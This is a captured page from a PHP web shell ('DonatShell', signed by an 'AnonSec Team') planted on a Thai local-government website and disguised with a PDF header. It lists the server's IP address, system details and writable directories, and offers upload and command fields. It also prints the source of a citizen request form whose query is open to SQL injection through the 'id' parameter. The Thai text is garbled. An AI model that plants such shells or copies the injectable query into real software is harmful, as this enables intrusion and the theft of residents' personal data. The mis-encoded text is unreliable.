%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 122.155.177.87  /  Your IP : 122.155.177.87
Web Server : Apache/2
System : Linux cat177-87.static.lnwhostname.com 3.10.0-1160.62.1.el7.x86_64 #1 SMP Tue Apr 5 16:57:59 UTC 2022 x86_64
User : apache ( 994)
PHP Version : 5.3.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,putenv,eval
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/thungkhana/domains/thungkhanan.go.th/public_html/form/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/thungkhana/domains/thungkhanan.go.th/public_html/form//detail_form_2.php
<?
		session_start();
		if($user==""){
		$message = "س Login ͹.";
			$url = "../admin/index.php";
			include("../admin/alert.php");
			exit;
       }
?>
<?php require_once('../admin/Connections/conndb.php'); ?>
<?php
$colname_Recordset1 = "-1";
if (isset($_GET['id'])) {
  $colname_Recordset1 = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($_GET['id']);
}
mysql_select_db($database_conndb, $conndb);
$query_Recordset1 = sprintf("SELECT * FROM form_2 WHERE id = %s", $colname_Recordset1);
$Recordset1 = mysql_query($query_Recordset1, $conndb) or die(mysql_error());
$row_Recordset1 = mysql_fetch_assoc($Recordset1);
$totalRows_Recordset1 = mysql_num_rows($Recordset1);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<title>ẺͧʹѺعػ-</title>
<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 5px;
	margin-right: 0px;
	margin-bottom: 5px;
	color:#000000;
}
-->
</style>
<link href="styles_form.css" rel="stylesheet" type="text/css" />
</head>

<body>
<div align="center">
  <table width="580" border="0" cellpadding="2" cellspacing="2">
    <tr align="center">
      <td height="25" colspan="2" class="from1">ẺͧʹѺʹعػ-<br>
      <img src="../images/logo-office.png"  /></td>
    </tr>
    <tr>
      <td width="196" class="form">&nbsp;</td>
      <td width="370" class="form"><div align="right">
       <?php echo $row_Recordset1['fm_place']; ?>
      </div></td>
    </tr>
    <tr>
      <td colspan="2" class="form"><div align="right">
        <? $d=explode("-",$row_Recordset1['fm_date']);
							$dd=$d[2];
							$mm=$d[1];
							switch($mm)
								{
										case "1":
										$printmonth = "Ҥ";
										break;
										case "2":
										$printmonth = "Ҿѹ";
										break;
										case "3":
										$printmonth = "Ҥ";
										break;
										case "4":
										$printmonth = "¹";
										break;
										case "5":
										$printmonth = "Ҥ";
										break;
										case "6":
										$printmonth = "Զع¹";
										break;
										case "7":
										$printmonth = "áҤ";
										break;
										case "8":
										$printmonth = "ԧҤ";
										break;
										case "9":
										$printmonth = "ѹ¹";
										break;
										case "10":
										$printmonth = "Ҥ";
										break;
										case "11":
										$printmonth = "Ȩԡ¹";
										break;
										case "12":
										$printmonth = "ѹҤ";
										break;
										}
							$yyyy=$d[0];
							$yy=$yyyy+543;
					 echo "ѹ ".$dd." ͹".$printmonth." .. ".$yy;	 ?>
</div></td>
    </tr>
  <tr>
        <td colspan="2" class="form"><div align="left" class="form">ͧ ͤ͹ʹѺʹعػ-</div></td>
      </tr>
      <tr>
        <td colspan="2" class="form"><div align="left" class="form">¹ ¡ͧúǹӺŷ觢ҹ</div></td>
      </tr>
    <tr>
      <td colspan="2" class="form"><div align="left" class="form">
        Ҿ<?php echo $row_Recordset1['fm_request']; ?>&nbsp;<?php echo $row_Recordset1['fm_name']; ?>     ҹŢ蠠<?php echo $row_Recordset1['fm_num']; ?>          
        <?php echo $row_Recordset1['fm_moo']; ?>Ӻŷ觢ҹ ´ ѧѴѹ&nbsp;&nbsp;	Ѿ        <?php echo $row_Recordset1['fm_phone']; ?>    <?php echo $row_Recordset1['fm_email']; ?></div></td>
    </tr>
    
    <tr>
      <td colspan="2" valign="top" class="form"><div align="left" class="form"> ӹǹ㹤͹.
      <?php echo $row_Recordset1['fm_family']; ?></div></td>
    </tr>
    
    <tr>
      <td width="196" valign="top" class="form"><div align="right" class="form">դʧͧ :</div></td>
      <td width="370" valign="top" class="form"><div align="left"><?php echo nl2br($row_Recordset1['fm_wish']); ?></div></td>
    </tr>
    <tr>
      <td width="196" valign="top" class="form"><div align="right" class="form">ԴͧҪзèع :<!--<br>
		(кػ  ѧ,,秤 Шӹǹ)--></div></td>
      <td width="370" valign="top" class="form"><div align="left"><?php echo nl2br($row_Recordset1['fm_desc']); ?></div></td>
    </tr>  
    <tr>
        <td height="30" colspan="2" align="right" class="form"><div align="center" class="form">
          <div align="left" class="form"> ¢ѺͧҢҾդʹ͹ҡâҴŹػ-
            ТҾǨͺҾͧҪСѡ纹Ҿҹش»С</div>
        </div></td>
	    </tr>
	<tr>
      <td colspan="2" class="styles1"><table width="720" border="0" cellspacing="0" cellpadding="0">
        <tr>
          <td width="360" valign="top"><div align="center">            
          </div></td>
          <td width="360" valign="top"><div align="center">
            <table width="360" border="0" cellspacing="2" cellpadding="2">
          <tr>
            <td><div align="center" class="form">(ŧ) <?php echo $row_Recordset1['fm_name']; ?> 蹤ͧ </div></td>
          </tr>
          <tr>
            <td><div align="center"><span class="form">(<?php echo $row_Recordset1['fm_request']; ?></span>&nbsp;<span class="form"><?php echo $row_Recordset1['fm_name']; ?>)</span></div></td>
          </tr>
        </table></div></td>
        </tr>
      </table></td>
    </tr>
     <tr>
      <td colspan="2" class="styles1"><table width="720" border="0" cellspacing="0" cellpadding="0">
        <tr>
          <td width="360" valign="top"><div align="center">
            <table width="360" border="0" cellspacing="2" cellpadding="2">
          <tr>
            <td><div align="left" class="form">
              <div align="center">.Ѻͧ <br />
                Ѻͧѹ
                
              </div>
            </div></td>
          </tr>
         <td><div align="left" class="form">...............................................................<br />
                ...............................................................<br />
         </div></td>
            </tr>          
         <tr><td style="height:5px;;"></td></tr>
         <tr>
              <td valign="top"><div align="center" class="form">ŧ .......................................<br />
                        ( .......................................................)
</div></td>
            </tr>

        </table>
          </div></td>
          <td width="360" valign="top"><div align="center">
            <table width="360" border="0" cellspacing="2" cellpadding="2">
            <tr>
              <td><div align="left" class="form">
                <div align="center"> ˹.ӹѡѴ<br /> 
                  繤ôԹ
                  
                </div>
              </div></td>
            </tr>
            <tr>
              <td><div align="left" class="form">...............................................................<br />
                ...............................................................<br />
              </div></td>
            </tr>            
            <tr><td style="height:5px;;"></td></tr>
          <tr>
              <td valign="top"><div align="center" class="form">ŧ .......................................<br />
                        (¡ Է
)
</div></td>
            </tr>
              </table>
          </div></td>
        </tr>
      </table></td>
    </tr>
    
    <tr>
      <td colspan="2" class="styles1"><div align="center">
        <table width="720" border="0" cellspacing="0" cellpadding="0">
          <tr>
            <td width="360" valign="top"><div align="center"><table width="360" border="0" cellspacing="2" cellpadding="2">
            <tr>
              <td><div align="left" class="form">
                <div align="center">繻Ѵ ͺ.<br />
                  Ԩó繤</div>
              </div>
			  </td>
            </tr>
            <tr>
              <td><div align="left" class="form">...............................................................<br />
                ...............................................................<br />
              </div></td>
            </tr>
			<tr><td style="height:5px;;"></td></tr>
            <tr>
              <td valign="top"><div align="center" class="form">ŧ .......................................<br />
                   ( ʹ)<br />
                        Ѵ ͺ.觢ҹ</div>
			  </td>
            </tr>
              </table>
			  </div>
			  </td>
            <td width="360" valign="top"><div align="center">
			<table width="360" border="0" cellspacing="2" cellpadding="2">
            <tr>
              <td><div align="left" class="form">
                <div align="center">觹¡ ͺ.觢ҹԨó </div>
              </div>
			  </td>
            </tr>
            <tr>
              <td><div align="left" class="form">...............................................................<br />
                ................................................................<br />
              </div></td>
            </tr>
			<tr><td style="height:5px;;"></td></tr>
            <tr>
              <td valign="top"><div align="center" class="form">ŧ .......................................<br />
                         (ҧѭ )<br />
                        
                         ¡ͧúǹӺŷ觢ҹ</div></td>
            </tr>
              </table></div></td>
          </tr>
        </table>
      </div></td>
    </tr>
    
    
    <tr>
      <td colspan="2" class="styles1"><div align="center"><a href="javascript:window.print()" class="styles2"><img src="images/print.gif" alt="" width="16" height="16" border="0" /></a></div></td>
    </tr>
  </table>
</div>
</body>
</html>
<?php
mysql_free_result($Recordset1);
  if($conndb)
	 {
	  mysql_close($conndb);
	  unset($conndb);
	 }
?>

Anon7 - 2022
AnonSec Team